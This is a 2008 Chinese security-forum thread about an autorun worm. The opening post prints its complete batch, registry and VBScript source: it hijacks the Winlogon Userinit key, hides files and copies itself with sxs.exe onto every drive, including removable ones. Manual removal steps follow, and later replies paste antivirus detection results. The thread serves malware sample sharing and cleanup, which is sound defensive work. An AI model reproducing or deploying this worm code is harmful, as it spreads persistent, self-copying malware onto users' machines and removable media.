autorun病毒

显示全部楼层 · 发表于 2008-5-1 17:52:53

新型超强autorun病毒的清除方法：
有些这种病毒手工杀更有效的，比如这个病毒：
在每个盘根目录下生成四个文件：autorun.inf,autorun.reg,autorun.bat,auto.vbs,可惜第一个文件被我弄丢了，下面把该病毒代码发给大家共享下：

autorun.bat

@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
';免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
';免杀

pen
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end

autorun.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002

QUOTE:

autorun.vbs

on error resume next
Set WshShell =CreateObject("WScript.Shell"

if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject"

set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:"

Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if

　　清除方法：
１．先去掉文件的隐藏属性．
２．再到system 32目录下删除autorun.*
　　　(＊表示后缀名为bat，reg，inf，vbs)
３．到每个盘的根目录下删除autorun．＊文件．
４．到这里就基本结束了．干净些就到注册表里把上文提到的autorun．reg文件中的项值逐一删除！自此ok！

[ 本帖最后由 promised 于 2008-5-1 18:02 编辑 ]

显示全部楼层 · 发表于 2008-5-1 17:58:36

[Found Trojan] <VBS/Autorun.C (exact, not disinfectable)> C:\test\autorun超强病毒.rar->autorun.vbs
[Found Trojan] <BAT/Autorun.C (exact, not disinfectable)> C:\test\autorun超强病毒.rar->autorun.bat

显示全部楼层 · 发表于 2008-5-1 18:01:40

请不要使用“超强”之类的标题党语言
况且这是老东西了

显示全部楼层 · 发表于 2008-5-1 18:06:04

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Worm.VBS.AuRun.a

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.42.30

显示全部楼层 · 发表于 2008-5-1 18:09:38

The requested object is INFECTED with the following viruses: Virus.VBS.Small.a

显示全部楼层 · 发表于 2008-5-1 18:19:10

autorun超强病毒.rar\autorun.vbs;C:\Documents and Settings\Administrator\桌面\autorun超强病毒.rar;VBS.Small;;
autorun超强病毒.rar\autorun.bat;C:\Documents and Settings\Administrator\桌面\autorun超强病毒.rar;VBS.Siggen.1814;;
autorun超强病毒.rar;C:\Documents and Settings\Administrator\桌面;发现压缩文件中有被感染的对象;;

显示全部楼层 · 发表于 2008-5-1 19:48:44

显示全部楼层 · 发表于 2008-5-1 19:51:13

进来就报

显示全部楼层 · 发表于 2008-5-1 20:22:47

Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://bbs.kafan.cn/attachment.p ... 4a&t=1209644544
Information: Contains detection pattern of the VBS script virus VBS/Small.P.1

Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.37, VDF 7.0.3.235

显示全部楼层 · 发表于 2008-5-1 20:43:17

ArcaVir miss

[病毒样本] autorun病毒

本帖子中包含更多资源

5/1

Kaspersky Internet Security 2009

本帖子中包含更多资源

本帖子中包含更多资源